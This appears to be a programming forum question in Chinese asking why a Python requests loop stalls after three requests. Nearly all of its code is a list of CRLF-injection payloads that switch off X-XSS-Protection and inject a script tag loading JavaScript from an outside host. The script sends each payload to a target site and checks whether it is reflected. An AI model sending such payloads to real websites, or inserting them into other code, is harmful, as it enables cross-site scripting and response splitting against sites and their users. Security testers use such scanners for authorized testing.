【发布时间】:2020-10-31 12:36:32
【问题描述】:
我有一个包含一些我想发送的请求的数组。基本上我发送的请求是网站+目录(在这种情况下:数组元素)。例如:http://randomwebsite.com/%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2Fhttp://anotherwebsite.com%3E%0d%0a0%0d%0a/%2e%2e
我的代码:
import requests
site="http://randomwebsite.com"
tcp_server = "http://anotherwebsite.com"
list_of_requests = [
"/%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%0d%0a0%0d%0a/%2e%2e",
"/%0a0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3D" + tcp_server + "%3E%3C%2Fscript%3E",
"/%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%OdX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%23%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%23%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%23%OdX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%25%30%61X-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%25%30aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%250aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%25250aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%2e%2e%2f%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%2f%2e%2e%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%2F..%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%3f%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%3f%OdX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%u000aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E"]
for payload in list_of_requests:
...
[some code here]
...
if str(payload) in requests.get(site + payload).text:
print("Request valid")
else:
print("Request not valid")
我的输出是这样的:
Request not valid
Request not valid
Request not valid
然后程序在发送这 3 个请求后停止,并且永远保持这种状态。我不明白为什么我不继续发送请求。
【问题讨论】:
标签: python-3.x python-requests newline